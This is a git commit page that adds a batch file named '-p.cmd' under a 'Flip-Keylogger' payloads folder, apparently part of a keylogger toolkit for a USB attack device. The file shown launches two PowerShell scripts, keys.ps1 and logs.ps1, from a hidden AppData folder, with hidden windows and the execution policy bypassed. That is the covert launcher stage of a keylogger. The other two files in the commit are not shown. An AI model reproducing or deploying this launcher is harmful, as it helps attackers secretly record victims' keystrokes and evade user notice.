Add files via upload
This commit is contained in:
parent
3b0035c7e6
commit
b2880e8a71
3 changed files with 160 additions and 0 deletions
10
Payloads/Flip-Keylogger/-p.cmd
Normal file
10
Payloads/Flip-Keylogger/-p.cmd
Normal file
|
@ -0,0 +1,10 @@
|
|||
@echo off
|
||||
powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/keys.ps1"
|
||||
powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/logs.ps1"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue